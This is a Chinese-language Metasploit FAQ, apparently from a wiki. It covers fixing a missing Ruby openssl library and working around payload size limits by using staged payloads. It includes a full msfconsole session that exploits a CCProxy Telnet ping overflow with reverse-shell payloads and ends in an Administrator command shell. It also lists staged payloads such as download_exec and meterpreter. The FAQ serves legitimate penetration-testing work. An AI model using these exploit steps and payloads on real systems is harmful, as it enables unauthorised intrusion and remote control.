Metasploit/常见问题解答
问:第一次运行 Metasploit 时,出现以下错误:没有找到此文件 - openssl (LoadError)
- 示例
[~/metasploit]# ./msfgui
./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
from ./lib/rex/socket/ssl_tcp_server.rb:4
from ./lib/rex/socket/comm/local.rb:5:in `require'
from ./lib/rex/socket/comm/local.rb:5
from ./lib/rex/socket.rb:22:in `require'
from ./lib/rex/socket.rb:22
from ./lib/rex.rb:71:in `require'
from ./lib/rex.rb:71
from ./msfgui:10:in `require'
from ./msfgui:10
答:Metasploit 需要 Ruby 实现的 openssl,而不是 Apache 等使用的标准 C 实现的 openssl。安装相关的 ruby-openssl 库。
- 示例(适用于 Debian - 检查您的操作系统或尝试使用 gem)
pwebster@metasploit:~$ apt-cache search ruby | grep openssl libopenssl-ruby - OpenSSL interface for Ruby libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8 libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9 pwebster@metasploit:~# apt-get install libopenssl-ruby
问:在为漏洞利用模块设置所有必需的参数并运行 exploit 后,我收到以下错误:[-] 漏洞利用失败:没有编码器成功编码缓冲区。
- 示例
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > info
Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
Version: $Revision$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
Patrick Webster <patrick [at] aushack.com>
Available targets:
Id Name
-- ----
0 Windows 2000 Pro SP0 - English
1 Windows 2000 Pro SP1 - English
2 Windows 2000 Pro SP2 - English
3 Windows 2000 Pro SP3 - English
4 Windows 2000 Pro SP4 - English
5 Windows XP SP0/1 - English
6 Windows 2003 Server SP0/1 - English
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 127.0.0.1 yes The target address
RPORT 23 yes The target port
Payload information:
Space: 200
Avoid: 5 characters
Description:
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet
service. The stack is overwritten when sending an overly long
address to the 'ping' command.
msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ccproxy_telnet_ping) > check
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
答:可用的有效负载(show payloads)取决于漏洞利用可用的内存“空间”。在上面的示例中,有效负载空间为:“空间:200”。但是,目标应用程序不允许使用某些字符(通常是空字符 0x00,因为它表示字符串(字符数组)的结束)。在本例中,有效负载不允许五个字符:“避免:5 个字符”
运行漏洞利用时,有效负载生成器将尝试将您所需的有效负载放入 200 个空间中,该空间不包含 5 个特定字符。这并不总是可能的,会导致以下错误:没有编码器成功编码缓冲区。
但是,一切并非没有希望。Metasploit 框架包括支持分段有效负载的能力。分段有效负载是一个明显更小的有效负载,它不会执行您所需的行动(例如反向 shell),而是启动一个分段平台,然后可以添加到该平台。因此,在本例中,它不会是一个完整的反向 shell,而是会
- 创建分段平台。
- 分配足够的空间来保存您所需的有效负载。
- 从您那里获取有效负载的其余部分。
- 将有效负载作为一个整体执行。
通常,所有分段漏洞利用都由所需有效负载后的“/”表示。以下是一些示例
windows/dllinject/reverse_tcp Windows Inject DLL, Reverse TCP Stager windows/download_exec/bind_tcp Windows Executable Download and Execute, Bind TCP Stager windows/exec/find_tag Windows Execute Command, Find Tag Ordinal Stager windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager
因此,既然我们知道它不能容纳“内联”有效负载,我们就可以使用分段器来代替
... msf exploit(ccproxy_telnet_ping) > exploit [-] Exploit failed: No encoders encoded the buffer successfully. msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ccproxy_telnet_ping) > exploit [*] Started reverse handler [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23... [*] Sending stage (474 bytes) [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\Documents and Settings\Administrator>